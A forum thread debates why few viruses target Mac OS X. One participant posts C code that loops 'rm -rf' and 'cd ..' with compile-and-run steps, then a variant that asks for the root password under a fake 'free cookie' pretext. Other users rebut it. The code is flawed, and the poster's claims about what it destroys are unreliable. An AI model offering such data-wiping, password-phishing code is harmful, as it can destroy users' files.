Seeing as their is also an exponential leap in the abilities of authorities like the FBI and secret service to analyze, disect, and eventually land your ass in jail, I think most hax aren't going to write maliciously launched code just for kicks.
Got a tip for us?
Let us know
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.
Why DOESN'T someone make a virus for mac?
- Thread starter G5Unit
- Start date
- Sort by reaction score
I have to disagree (repsectfully of course)
There is a difference between a direct attack from a human Hacker, and something that is a software based attack, like a Virus, Trojan etc. A good example of this was the hackathon, where the Air got hacked first by visiting a malicously formed URL.
With regards to you corporate angle, the majority of money that these people make, comes from credit card fraud, but not business use. From your everyday user at the end of the working day, who comes home and wants to buy something on ebay/craiglist etc. The bot sits quietly, logging what it needs, then sends off the data that it can. The money in business pales in comparision to the money spent by everyday users, due to sheer volume.
We seem to view these people that make these threats as uber criminals. These criminals have nothing on the kid hobbiest sitting in his bedroom hitting on problems repeatedly. The dreaded MPack kit was a venture between two mates. I think even Times reported that Storm started off as a science project.
An interview with one of the authors for MPack even stated that they did it 'just because the could'. When they realized they could making a living out of it, they sold it. He likened it to "It's like military. We make the ammo, but we dont fire it". Pretty apt.
Its when criminals realized the power that could be garnered, that these hobbiests were recruited. Whats there not to like? You probably get notoriety, a very good pay package, and little chance of being caught. And even if you were, low chance of being convicted.
In relation to market share. Lets say 6%. If there were 100 computers in the world, understandable, thats only 6 computers you could infect. But there are faaar more. In fact, its estimated at being over a billion. thats over 60 million computers at 6%. Even if you could only infect a small percentage of this, its still a massive number. Say one third. 20 million. Thats roughly the population of Australia.
Hell, they even made a virus of OS9, and that probably had less then 2% percent use overall.
I fully believe there are people working on OSX right as we speak. Not for money, not for hate, but for kicks and giggles. And if one does make a self propogating virus, imagine all the tech sites, all the tech pod casts, and the ezines, the tech shows, the websites, the experts, the companies that will report on it. It would be... a hell of a rush know that it was you.
Because there aren't many macs lol
Macs are about 2% of the computer industry. If I were a hacker I wouldn't bother...
Macs are about 2% of the computer industry. If I were a hacker I wouldn't bother...
Ahh but Linux and BSD make up the majority of the webservers. Since BSD (Darwin) is the foundation of OSX then there is a reason to hack into them.
Good point, and that OS X is reported to be above the 8% share at this point (even some reports close to 10)
http://solyoung.com/2009/02/03/mac-os-x-operating-system-market-share-bumping-10-percent-993/
http://www.cultofmac.com/osx-market-share-hits-82-percent/3421
http://arstechnica.com/apple/news/2008/07/mac-os-x-approaches-8-percent-market-share-in-june.ars
1) a lot of hackers are actually Apple users because of the UNIX based os, or Apple user wannabees. You don't piss in your own bed.
2) Apple is not considered 'evil', Microsoft is.
Good example are those "hack it, own it" competitions. Apple machines are consistently hacked first, not because it is easier (typically the hack used also works on Linux or Windows), but because they want the machine.
2) Apple is not considered 'evil', Microsoft is.
Good example are those "hack it, own it" competitions. Apple machines are consistently hacked first, not because it is easier (typically the hack used also works on Linux or Windows), but because they want the machine.
^^^ agreed.
every hacker i knew in high school and college used a mac as their primary machine. to me, second to market share, i've always thought hackers don't touch OS X is because a lot (or maybe even most) use macs and don't want to see that happen to them.
every hacker i knew in high school and college used a mac as their primary machine. to me, second to market share, i've always thought hackers don't touch OS X is because a lot (or maybe even most) use macs and don't want to see that happen to them.
That's the one virus I would intentionally put on my computer. But it's random and only happens once. What good is that? I want it as a "party trick".
You can get the Amish Virus, seen here:
Computer Virus!
You have just received the Amish virus.
Since we have no electricity or computers, you are on the honor system.
Please delete all of your files on your hard drive. Then forward this message to everyone in your address book.
We thank thee.
Computer Virus!
You have just received the Amish virus.
Since we have no electricity or computers, you are on the honor system.
Please delete all of your files on your hard drive. Then forward this message to everyone in your address book.
We thank thee.
On this topic I would like to add something, here I will show source code for a virus that I just wrote up. DO NOT DO THIS, I am not responsible for someone copying this file, compiling and executing it.
*YOU HAVE BEEN WARNED*
The above code is C/C++, very simple program, yet the above 2 lines in conjunction with the infinite loop are the most lethal combination known to unix users.
What does it do? Well, after you compile that program and call the executable lets say, "destruction" you would then type
To run it.
Now back to what it does, for anyone here that knows what the unix command "rm" does, it deletes a file. "rm file" deletes said file. rm -r deletes EVERYTHING inside a current directory, so if you were in documents directory (folder) and you ran "rm -r" then everything would get deleted, however it would ask you for each deletion do you want to do this?
Now this is where the -f comes in. It basically means don't complain, just delete without asking me.
So "rm -rf" would recursively delete EVERY file AND directory inside whatever directory you ran that program in. To make matters worse after it did that it would climb up a directory and run again, eventually leading it to your root directory and running rm -rf which would delete everything on your computer, even system files.
That is the ultimate virus IMO. However you have to be stupid to actually execute that.
To compile btw write that into a file (call it destruction.cpp) then go in terminal and find it and type "gcc destruction.cpp -o destruction" then type "./destruction" and your computer would be dead.
DO NOT DO THIS. I am not joking, this actually works. You are safe from someone doing this on your computer because you need to type a password to run that.
*YOU HAVE BEEN WARNED*
PHP:
void main()
{
while (1)
{
system("rm -rf");
system("cd ..");
}
}The above code is C/C++, very simple program, yet the above 2 lines in conjunction with the infinite loop are the most lethal combination known to unix users.
What does it do? Well, after you compile that program and call the executable lets say, "destruction" you would then type
Code:
./destructionTo run it.
Now back to what it does, for anyone here that knows what the unix command "rm" does, it deletes a file. "rm file" deletes said file. rm -r deletes EVERYTHING inside a current directory, so if you were in documents directory (folder) and you ran "rm -r" then everything would get deleted, however it would ask you for each deletion do you want to do this?
Now this is where the -f comes in. It basically means don't complain, just delete without asking me.
So "rm -rf" would recursively delete EVERY file AND directory inside whatever directory you ran that program in. To make matters worse after it did that it would climb up a directory and run again, eventually leading it to your root directory and running rm -rf which would delete everything on your computer, even system files.
That is the ultimate virus IMO. However you have to be stupid to actually execute that.
To compile btw write that into a file (call it destruction.cpp) then go in terminal and find it and type "gcc destruction.cpp -o destruction" then type "./destruction" and your computer would be dead.
DO NOT DO THIS. I am not joking, this actually works. You are safe from someone doing this on your computer because you need to type a password to run that.
Not a virus as it is not self propogating, and you need to give it permission for the payload to work..
Look up the notorious command "rm -rf" if you don't believe me.
Then look up "cd ..".
Then look up an infinite loop (if you have taken any computer science class you know what that is).
Then imagine what you can do with all 3 combined.
I do not need to give it permissions, the -f takes care of that.
For it to run however, the user actually has to tell it to run. This is why the unix plateform is so secure, you either A) Have to be super user to run it or B) type ./execuatable to make it run.
As far as making it self propogating consider this:
You go to a website that has a java applications, java applications automatically start loading (which means they are executing on your computer automatically). Now what if that application did something such as... run the command:
Code:
[B]./destruction[/B]It would run that program I wrote for you, whether you like it or not. The catch is most java applications have safe guards when accessing the command line so likely you would be notified that "something is trying to access your computer, Allow/Deny". If you allowed it, then yes it could run that program, or even install that and then run it.
Oh, I disagree. I've clashed on a number of occasions with some of the more militant open source activists in the linux community who indeed feel that Apple is an evil corporate entity.
However, even assuming that these people were motivated enough to write a virus, doing so for OS X isn't in their best interests because it's very likely that any vulnerability they would find could also affect linux.
Actually, this is only true for the files that the user running the program has permissions to. So, assuming that you still have to convince someone to run this program, the program you've written will delete everything in the current directory, move up one level, delete everything there, move up one and so on UNTIL it runs into a directory or file that the user it's running as doesn't have permissions to.
So on a Mac, the user running this program will wind up wiping out his home directory. Then the moment the program traverses outside, it'll hit a permissions wall.
Destructive? Yes. Will it destory the OS? Unlikely unless you modify the code to run sudo AND convince the user to enter their admin password.
Is this a virus? No. Doesn't fit the criteria.
That's not self-propagation. That's called visiting a website that attempts to run malicious code.
Additionally, the website is assuming that a. you have the program you've written saved on the computer, and b. you're taking advantage of some kind of exploit in java that allows it to run arbitrary code.
You MIGHT be able to find b. But you still have to somehow make a. happen.
And then, it's only a matter of time before mac users going to your site see something like this from Safari (and possibly from Firefox as well):
Even ignoring all of this though, what you've written is still not a virus because you haven't cracked the self propagation thing.
Like this?
PHP:
#include <stdin.h>
void main()
{
printf("Please enter your root password for a free cookie.");
system("su");
while (1)
{
system("rm -rf");
system("cd ..");
}
}Once again, please no one actually copy this into a file, compile and run this program.
I'm not going to show more ways of how destructive I can be. Am I destructive? No (I'm a good person), but can I be? If someone got a hold of me, then most definitely.
Exactly, for example:
Kevin Mitnick, former hacker and Most Wanted Computer Criminal turned security consultant, is a Mac user
http://obamapacman.com/2009/09/kevi...minal-turned-security-consultant-is-mac-user/
Nice..
So you are saying that you are willing to commit a crime for the right amount of money?
I love my Mac but most people know Microsoft still dominates volume, not quality, but volume is what matters to virus and hackers.
I think Mac make up like 2-3% of the computer population, your virus won't get far if it starts and can only spread to Macs
Just my 2 cents.
I think Mac make up like 2-3% of the computer population, your virus won't get far if it starts and can only spread to Macs
Just my 2 cents.
Like this?
PHP:#include <stdin.h> void main() { printf("Please enter your root password for a free cookie."); system("su"); while (1) { system("rm -rf"); system("cd .."); } }
Once again, please no one actually copy this into a file, compile and run this program.
I'm not going to show more ways of how destructive I can be. Am I destructive? No (I'm a good person), but can I be? If someone got a hold of me, then most definitely.
That is a Trojan.
No already proven incorrect, as you are forgetting something. Mac OS X is based on BSD (called Darwin). BSD is very similar to Linux (both are Unix like). BSD and Linux make up most of the webservers in the world. A virus that targets BSD/Linux would also target Macs as a side effect. Therefore it is potentially vulnerable.